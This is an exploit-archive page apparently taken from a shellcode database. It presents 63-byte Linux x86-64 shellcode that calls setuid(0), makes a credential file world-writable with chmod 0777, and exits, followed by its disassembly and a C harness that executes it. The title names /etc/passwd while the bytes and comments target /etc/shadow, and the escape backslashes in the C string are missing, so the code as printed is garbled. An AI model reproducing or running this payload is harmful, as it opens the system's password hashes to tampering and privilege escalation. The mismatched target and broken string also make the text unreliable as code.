[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
# Published : 2010-06-17
# Author : Jonathan Salwan
# Previous Title : Polymorphic Bindport 31337 with setreuid (0,0) linux/x86
# Next Title : Solaris/x86 - Sync() & reboot() & exit(0) - 48 bytes
/*
Title: Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
Date: 2010-06-17
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
<-- _setuid(0) -->
400078: 48 31 ff xor %rdi,%rdi
40007b: 48 31 c0 xor %rax,%rax
40007e: b0 69 mov $0x69,%al
400080: 0f 05 syscall
<-- _chmod("/etc/shadow", 0777) -->
400082: 48 31 d2 xor %rdx,%rdx
400085: 66 be ff 01 mov $0x1ff,%si
400089: 48 bb ff ff ff ff ff mov $0x776f64ffffffffff,%rbx
400090: 64 6f 77
400093: 48 c1 eb 28 shr $0x28,%rbx
400097: 53 push %rbx
400098: 48 bb 2f 65 74 63 2f mov $0x6168732f6374652f,%rbx
40009f: 73 68 61
4000a2: 53 push %rbx
4000a3: 48 89 e7 mov %rsp,%rdi
4000a6: 48 31 c0 xor %rax,%rax
4000a9: b0 5a mov $0x5a,%al
<-- _exit(0) -->
4000ab: 0f 05 syscall
4000ad: 48 31 ff xor %rdi,%rdi
4000b0: 48 31 c0 xor %rax,%rax
4000b3: b0 3c mov $0x3c,%al
4000b5: 0f 05 syscall
*/
#include <stdio.h>
char *SC = "x48x31xffx48x31xc0xb0x69x0fx05"
"x48x31xd2x66xbexffx01x48xbbxff"
"xffxffxffxffx64x6fx77x48xc1xeb"
"x28x53x48xbbx2fx65x74x63x2fx73"
"x68x61x53x48x89xe7x48x31xc0xb0"
"x5ax0fx05x48x31xffx48x31xc0xb0"
"x3cx0fx05";
int main(void)
{
fprintf(stdout,"Length: %dn",strlen(SC));
(*(void(*)()) SC)();
return 0;
}